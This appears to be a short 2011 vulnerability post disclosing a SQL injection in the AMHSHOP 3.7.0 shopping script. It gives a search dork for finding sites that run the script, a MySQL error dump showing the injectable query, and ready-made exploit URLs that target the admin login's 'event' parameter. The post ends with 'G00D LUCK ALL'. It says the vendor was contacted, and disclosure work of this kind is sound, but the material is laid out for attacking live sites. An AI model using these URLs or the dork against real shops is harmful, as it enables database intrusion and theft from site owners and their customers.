AMHSHOP 3.7.0 SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+] Title            : AMHSHOP 3.7.0 SQL Injection

[+] Name             : AMHSHOP 3.7.0

[+] Affected Version : v3.7.0

[+] Description      : it's an arabic Shopping Script [Payable]

[+] Software         : http://amhserver.com/37/ & http://www.metjar.com/

[+] Tested on        : (L):Vista & Windows Xp and Windows 7

[+] Dork             : Powered by AMHSHOP 3.7.0

[+] Date             : 14/06/2011

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+] Author           : Yassin Aboukir

[+] Contact          : 01Xp01@Gmail.com<script type="text/javascript">

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</script>

[+] Site             : http://www.yaboukir.com

[+] Greetz           : Th3 uNkn0wnS Team ! & All My friends

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+] Error:

MySQL

* Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1

* Error Number:1064

* SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1

# we had contacted the owner before and some websites have fixed the bug ;)

[-]   Exploit:-

# http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]

# http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'

G00D LUCK ALL :)